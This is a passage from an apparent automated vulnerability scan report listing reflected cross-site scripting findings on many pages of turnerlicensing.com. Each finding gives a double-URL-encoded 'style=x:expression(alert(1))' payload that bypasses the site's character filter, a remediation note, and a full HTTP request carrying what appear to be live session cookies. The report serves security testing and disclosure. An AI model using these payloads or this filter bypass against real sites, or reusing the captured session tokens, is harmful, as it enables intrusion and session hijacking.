GET /NBA/portland_trail_blazers?8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.47. http://www.turnerlicensing.com/NBA/sacramento_kings [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/sacramento_kings
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7b27'style='x:expression(alert(1))'dbda3da870d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/sacramento_kings?a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.48. http://www.turnerlicensing.com/NBA/san_antonio_spurs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/san_antonio_spurs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7529'style='x:expression(alert(1))'95ef547ec66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/san_antonio_spurs?f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.49. http://www.turnerlicensing.com/NBA/san_antonio_spurs/8010807 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/san_antonio_spurs/8010807
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae55b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274a4aaea7f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae55b'style='x:expression(alert(1))'4a4aaea7f43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.50. http://www.turnerlicensing.com/NBA/seattle_supersonics [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/seattle_supersonics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e46d'style='x:expression(alert(1))'67e2d14c890 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/seattle_supersonics?4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.51. http://www.turnerlicensing.com/NBA/toronto_raptors [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/toronto_raptors
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 626bf'style='x:expression(alert(1))'ceefe8f1570 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/toronto_raptors?626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.52. http://www.turnerlicensing.com/NBA/utah_jazz [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/utah_jazz
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf4d0'style='x:expression(alert(1))'e0d3723f51a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/utah_jazz?bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.53. http://www.turnerlicensing.com/NBA/washington_wizards [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/washington_wizards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61f21'style='x:expression(alert(1))'0b6453a6910 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/washington_wizards?61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.54. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NFL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.55. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NHL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.56. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Players
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.57. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Stadiums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.58. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Turner-Contact-Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.59. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Turner-Email-Sign-Up
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.60. http://www.turnerlicensing.com/app/site/backend/additemtocart.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /app/site/backend/additemtocart.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f08f"style%3d"x%3aexpression(alert(1))"b8d118caa4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f08f"style="x:expression(alert(1))"b8d118caa4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
1.61. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /book_covers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.62. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /box_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.63. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
